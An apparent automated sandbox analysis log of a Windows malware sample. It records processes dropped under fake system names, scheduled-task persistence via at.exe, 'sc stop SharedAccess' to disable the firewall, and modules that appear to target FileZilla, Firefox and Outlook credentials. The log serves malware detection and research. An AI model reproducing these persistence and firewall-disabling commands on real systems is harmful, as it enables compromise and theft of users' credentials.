                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System\svchost.exe "C:\windows\system\svchost.exe" RO
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccess
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= auto
                Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess created: C:\Users\user\Desktop\lg3gn9y1cj.exe c:\users\user\desktop\lg3gn9y1cj.exe Jump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exeJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exeJump to behavior
                Source: C:\Windows\System\explorer.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SEJump to behavior
                Source: C:\Windows\System\spoolsv.exeProcess created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PRJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccessJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= autoJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvcJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\~DF01383C41703FF854.TMPJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5500:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3856:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4316:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:240:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exe
                Source: unknownProcess created: C:\Windows\System\explorer.exe
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exeJump to behavior
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, Linq4you/FileZilla.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, Linq4you/SystemInfo.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, ThunderFox/MozillaTFOXPBE.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, Linq4you/FileZilla.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, Linq4you/SystemInfo.csCryptographic APIs: 'CreateDecryptor'
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, ThunderFox/MozillaTFOXPBE.csCryptographic APIs: 'TransformFinalBlock'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Binary string: C:\Users\KINGDOM\Documents\New Builder\Linq4you\Linq4you\obj\x86\Release\Linq4me.pdb source: lg3gn9y1cj.exe , lg3gn9y1cj.exe , 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, lg3gn9y1cj.exe , 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20220805_070938_705.etl.45.dr
                Source: Binary string: C:\Users\KINGDOM\Documents\New Builder\Linq4you\Linq4you\obj\x86\Release\Linq4me.pdbDO source: lg3gn9y1cj.exe , 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, lg3gn9y1cj.exe , 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected CryptOne packer
                Source: C:\Windows\System\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32Jump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Code function: 1_2_0040B64D push cs; ret 1_2_0040B6F9
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Code function: 1_2_0040AE9E push ds; ret 1_2_0040B5EB
                Source: Lg3gn9y1Cj.exeStatic PE information: section name: .tdata
                Source: icsys.icn.exe.0.drStatic PE information: section name: .tdata
                Source: explorer.exe.4.drStatic PE information: section name: .tdata
                Source: spoolsv.exe.5.drStatic PE information: section name: .tdata
                Source: mrsys.exe.5.drStatic PE information: section name: .tdata
                Source: svchost.exe.7.drStatic PE information: section name: .tdata
                Source: stsys.exe.8.drStatic PE information: section name: .tdata

                Persistence and Installation Behavior

                barindex
                Drops executables to the windows directory (C:\Windows) and starts them
                Source: C:\Windows\System\svchost.exeExecutable created and started: c:\windows\system\spoolsv.exeJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeExecutable created and started: c:\windows\system\explorer.exeJump to behavior
                Source: C:\Windows\System\spoolsv.exeExecutable created and started: c:\windows\system\svchost.exeJump to behavior
                Drops PE files with benign system names
                Source: C:\Windows\System\spoolsv.exeFile created: C:\Windows\System\svchost.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\icsys.icn.exeFile created: C:\Windows\System\explorer.exeJump to dropped file
                Source: C:\Windows\System\explorer.exeFile created: C:\Windows\System\spoolsv.exeJump to dropped file
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile created: C:\Users\user\Desktop\lg3gn9y1cj.exe Jump to dropped file
                Source: C:\Windows\System\spoolsv.exeFile created: C:\Windows\System\svchost.exeJump to dropped file
                Source: C:\Windows\System\explorer.exeFile created: C:\Users\user\AppData\Roaming\mrsys.exeJump to dropped file
                Source: C:\Windows\System\svchost.exeFile created: C:\Users\user\AppData\Local\stsys.exeJump to dropped file
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile created: C:\Users\user\Desktop\lg3gn9y1cj.exe Jump to dropped file
                Source: C:\Users\user\AppData\Local\icsys.icn.exeFile created: C:\Windows\System\explorer.exeJump to dropped file
                Source: C:\Windows\System\explorer.exeFile created: C:\Windows\System\spoolsv.exeJump to dropped file
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile created: C:\Users\user\AppData\Local\icsys.icn.exeJump to dropped file
                Source: C:\Windows\System\spoolsv.exeFile created: C:\Windows\System\svchost.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\icsys.icn.exeFile created: C:\Windows\System\explorer.exeJump to dropped file
                Source: C:\Windows\System\explorer.exeFile created: C:\Windows\System\spoolsv.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Creates an undocumented autostart registry key
                Source: C:\Windows\System\explorer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                Source: C:\Windows\System\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccessJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccess
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
